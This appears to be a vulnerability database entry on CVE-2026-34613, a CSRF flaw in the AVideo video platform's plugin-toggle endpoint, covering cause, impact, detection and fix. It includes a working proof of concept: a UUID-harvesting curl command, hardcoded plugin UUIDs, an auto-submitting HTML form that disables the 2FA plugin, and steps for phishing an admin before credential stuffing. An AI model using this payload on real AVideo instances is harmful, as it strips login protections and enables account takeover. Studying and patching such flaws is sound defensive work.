
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34613 is a Cross-Site Request Forgery (CSRF) vulnerability in WWBN AVideo, an open source video platform, affecting versions 26.0 and prior. The flaw exists in the objects/pluginSwitch.json.php endpoint, which allows administrators to enable or disable plugins without validating a CSRF token. Discovered by aisafe.io and published on March 30, 2026, the vulnerability carries a CVSS v3.1 base score of 6.5 (Medium/Moderate) (GitHub Advisory, Github Advisory DB). At the time of initial publication, no patched version was available, though patch commits have since been referenced in the advisory (Github Advisory DB).
The root cause is CWE-352 (Cross-Site Request Forgery): the objects/pluginSwitch.json.php endpoint verifies only that the requester has an active admin session, but performs no CSRF token validation. Compounding the issue, the plugins database table is explicitly listed in ignoreTableSecurityCheck() within objects/Object.php:529, which bypasses the ORM-level Referer/Origin domain validation that normally serves as a secondary CSRF defense in ObjectYPT::save(). Additionally, AVideo session cookies are configured with SameSite=None, ensuring cross-origin requests carry the admin session cookie. Plugin UUIDs — required to target specific plugins — are hardcoded constants exposed in frontend JavaScript source code, making them trivially discoverable by any attacker (GitHub Advisory).
Vulnerable code snippet:
// objects/pluginSwitch.json.php
if (!User::isAdmin()) { die('{"error": "Must be admin"}'); }
$obj = new Plugin(0);
$obj->loadFromUUID($_POST['uuid']);
$obj->setStatus($_POST['status']);
$obj->save();Successful exploitation allows an unauthenticated attacker to silently disable any installed AVideo plugin by tricking an authenticated administrator into visiting a malicious page. The most severe consequence is disabling the LoginControl plugin, which removes two-factor authentication and brute force protection for all users, dramatically lowering the barrier for account takeover. Subscription and payment enforcement plugins (PayPal, Stripe) can also be disabled, granting unauthorized access to paid content, while disabling access control plugins exposes private or restricted videos to the public. The attack leaves no visible indication to the administrator, making detection difficult without log analysis (GitHub Advisory).
A proof-of-concept (PoC) exploit is publicly available in the GitHub Security Advisory, including a complete HTML form payload and curl commands with specific plugin UUIDs and parameters (GitHub Advisory). The EPSS score is approximately 0.014% (1st percentile), indicating a low current probability of active exploitation. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
curl -s "https://your-avideo-instance.com/" | grep -oP '[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'Alternatively, use known hardcoded UUIDs (e.g., LoginControl: LoginControl-5ee8405eaaa16, Gallery: a06505bf-3570-4b1f-977a-fd0e5cab205d).
<form id="disable1" action="https://target-avideo.com/objects/pluginSwitch.json.php" method="POST">
<input type="hidden" name="uuid" value="LoginControl-5ee8405eaaa16">
<input type="hidden" name="status" value="inactive">
</form>
<script>document.getElementById('disable1').submit();</script>Deliver the link: Lure an authenticated AVideo administrator to the malicious page via phishing email, social engineering, or embedding in a comment/message on the platform.
CSRF executes: When the admin visits the page, their browser automatically submits the cross-origin POST request to pluginSwitch.json.php, carrying the PHPSESSID cookie (sent due to SameSite=None). The endpoint validates only admin session status and processes the request, disabling the targeted plugin.
Verify impact: Confirm the plugin is disabled (e.g., 2FA is no longer enforced for logins), then proceed with follow-on attacks such as credential stuffing or accessing restricted content (GitHub Advisory).
/objects/pluginSwitch.json.php with a Referer header pointing to an external domain; requests originating from unusual IP addresses or user agents targeting this endpoint.objects/pluginSwitch.json.php with parameters uuid=<plugin-uuid>&status=inactive from unexpected referrers or at unusual times; absence of a valid CSRF token in the request body.plugins table for unexpected status='inactive' entries on security-relevant plugins (GitHub Advisory).The recommended fix is to add CSRF token validation in objects/pluginSwitch.json.php immediately after the admin check, using AVideo's existing isGlobalTokenValid() function:
if (!isGlobalTokenValid()) { forbiddenPage('Invalid CSRF token'); }Administrators should update to a version of AVideo that includes this fix (commits 7ddfe4e and da37510 are referenced in the advisory). As a workaround, restrict administrative access to trusted networks or VPN, and consider changing session cookie SameSite policy from None to Strict or Lax to reduce cross-origin cookie delivery. Regularly audit the plugin status in the admin panel to detect unauthorized changes (GitHub Advisory, Github Advisory DB).
The vulnerability was discovered and reported by aisafe.io and credited to researcher adrgs. The advisory was published by DanielnetoDotCom (the AVideo maintainer) on March 30, 2026. The CVE was noted on Bluesky via the CVE tracking account shortly after publication. No significant broader media coverage or notable researcher commentary beyond the advisory itself has been identified at this time (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."